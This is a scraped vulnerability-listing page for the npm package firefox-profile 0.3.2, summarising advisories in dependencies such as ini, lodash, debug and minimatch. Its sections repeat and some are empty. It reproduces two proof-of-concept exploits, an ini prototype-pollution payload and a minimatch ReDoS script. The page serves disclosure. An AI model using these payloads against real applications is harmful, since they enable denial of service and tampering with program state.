Version Details and Security Vulnerabilities

📦

firefox-profile

0.3.2

Comparision Betweeen 0.3.2 and 0.3.1

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

firefox-profile

0.3.2

Comparision Betweeen 0.3.2 and 0.3.1

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 0.3.2 of the package firefox-profile.

All Security Vulnerabilities

All the vulnerabilities related to the version 0.3.2 of the package

Summary:

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Details:

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

Details about ini@1.2.1

Summary:

Command Injection in lodash

Details:

lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.

Details about lodash@2.4.2

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.11 are vulnerable to prototype pollution.

The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.

Recommendation

Update to version 4.17.11 or later.

Details about lodash@2.4.2

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.5 are vulnerable to prototype pollution.

The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.

Recommendation

Update to version 4.17.5 or later.

Details about lodash@2.4.2

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.

Recommendation

Update to version 4.17.12 or later.

Details about lodash@2.4.2

Summary:

xml2js is vulnerable to prototype pollution

Details:

xml2js versions before 0.5.0 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.

Details about xml2js@0.4.23

Summary:

Remote Memory Exposure in bl

Details:

A buffer over-read vulnerability exists in bl <4.0.3, <3.0.1, <2.2.1, and <1.2.3 which could allow an attacker to supply user input (even typed) that if it ends up in consume() argument and can become negative, the BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

Details about bl@0.9.5

Summary:

debug Inefficient Regular Expression Complexity vulnerability

Details:

A vulnerability classified as problematic has been found in debug-js debug up to 3.0.x. This affects the function useColors of the file src/node.js. The manipulation of the argument str leads to inefficient regular expression complexity. Upgrading to version 3.1.0 is able to address this issue. The name of the patch is c38a0166c266a679c8de012d4eaccec3f944e685. It is recommended to upgrade the affected component. The identifier VDB-217665 was assigned to this vulnerability. The patch has been backported to the 2.6.x branch in version 2.6.9.

Details about debug@1.0.5

Summary:

Regular Expression Denial of Service in debug

Details:

Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter.

As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.

This was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.

Recommendation

Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.

Details about debug@1.0.5

Summary:

minimatch ReDoS vulnerability

Details:

A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.

Details about minimatch@2.0.10

Summary:

Regular Expression Denial of Service in minimatch

Details:

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”);

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = “”;
  for (i=0; i<=len; i++) {
    result = result + chr;
  }
  return result;
}

var exploit = “[!” + genstr(1000000, “\\”) + “A”;

// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

Details about minimatch@2.0.10

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 0.3.2 of the package firefox-profile.

All Security Vulnerabilities

All the vulnerabilities related to the version 0.3.2 of the package

Summary:

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Details:

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

Details about ini@1.2.1

Summary:

Command Injection in lodash

Details:

lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.

Details about lodash@2.4.2

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.11 are vulnerable to prototype pollution.

Recommendation

Update to version 4.17.11 or later.

Details about lodash@2.4.2

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash before 4.17.5 are vulnerable to prototype pollution.

Recommendation

Update to version 4.17.5 or later.

Details about lodash@2.4.2

Summary:

Prototype Pollution in lodash

Details:

Recommendation

Update to version 4.17.12 or later.

Details about lodash@2.4.2

Summary:

xml2js is vulnerable to prototype pollution

Details:

Details about xml2js@0.4.23

Summary:

Remote Memory Exposure in bl

Details:

Details about bl@0.9.5

Summary:

debug Inefficient Regular Expression Complexity vulnerability

Details:

Details about debug@1.0.5

Summary:

Regular Expression Denial of Service in debug

Details:

Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter.

As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.

This was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.

Recommendation

Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.

Details about debug@1.0.5

Summary:

minimatch ReDoS vulnerability

Details:

Details about minimatch@2.0.10

Summary:

Regular Expression Denial of Service in minimatch

Details:

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”);

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = “”;
  for (i=0; i<=len; i++) {
    result = result + chr;
  }
  return result;
}

var exploit = “[!” + genstr(1000000, “\\”) + “A”;

// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

Details about minimatch@2.0.10

Version Details and Security Vulnerabilities

firefox-profile

Comparision Betweeen 0.3.2 and 0.3.1

Security Vulnerabilities

Version Details and Security Vulnerabilities

firefox-profile

Comparision Betweeen 0.3.2 and 0.3.1

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Overview

Patches

Steps to reproduce

Recommendation

Recommendation

Recommendation

Recommendation

Proof of Concept

Recommendation

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Overview

Patches

Steps to reproduce

Recommendation

Recommendation

Recommendation

Recommendation

Proof of Concept

Recommendation

Version Details and Security Vulnerabilities

firefox-profile

Comparision Betweeen 0.3.2 and 0.3.1

Security Vulnerabilities

Version Details and Security Vulnerabilities

firefox-profile

Comparision Betweeen 0.3.2 and 0.3.1

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ini@1.2.1 GHSA-qqgx-2p2h-9c37 7.3

Overview

Patches

Steps to reproduce

lodash@2.4.2 GHSA-35jh-r3h4-6jhm 7.2

lodash@2.4.2 GHSA-4xc9-xhrj-v574 N/A

Recommendation

lodash@2.4.2 GHSA-fvqr-27wr-82fm 6.5

Recommendation

lodash@2.4.2 GHSA-jf85-cpcp-j695 9.1

Recommendation

xml2js@0.4.23 GHSA-776f-qx25-q3cc 5.3

bl@0.9.5 GHSA-pp7h-53gx-mx7r 6.5

debug@1.0.5 GHSA-9vvw-cc9w-f27h 7.5

debug@1.0.5 GHSA-gxpj-cx7g-858c 3.7

Recommendation

minimatch@2.0.10 GHSA-f8q6-p94x-37v3 7.5

minimatch@2.0.10 GHSA-hxm2-r34f-qmc5 7.5

Proof of Concept

Recommendation

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

ini@1.2.1 GHSA-qqgx-2p2h-9c37 7.3

Overview

Patches

Steps to reproduce

lodash@2.4.2 GHSA-35jh-r3h4-6jhm 7.2

lodash@2.4.2 GHSA-4xc9-xhrj-v574 N/A

Recommendation

lodash@2.4.2 GHSA-fvqr-27wr-82fm 6.5

Recommendation

lodash@2.4.2 GHSA-jf85-cpcp-j695 9.1

Recommendation

xml2js@0.4.23 GHSA-776f-qx25-q3cc 5.3

bl@0.9.5 GHSA-pp7h-53gx-mx7r 6.5

debug@1.0.5 GHSA-9vvw-cc9w-f27h 7.5

debug@1.0.5 GHSA-gxpj-cx7g-858c 3.7

Recommendation

minimatch@2.0.10 GHSA-f8q6-p94x-37v3 7.5

minimatch@2.0.10 GHSA-hxm2-r34f-qmc5 7.5

Proof of Concept

Recommendation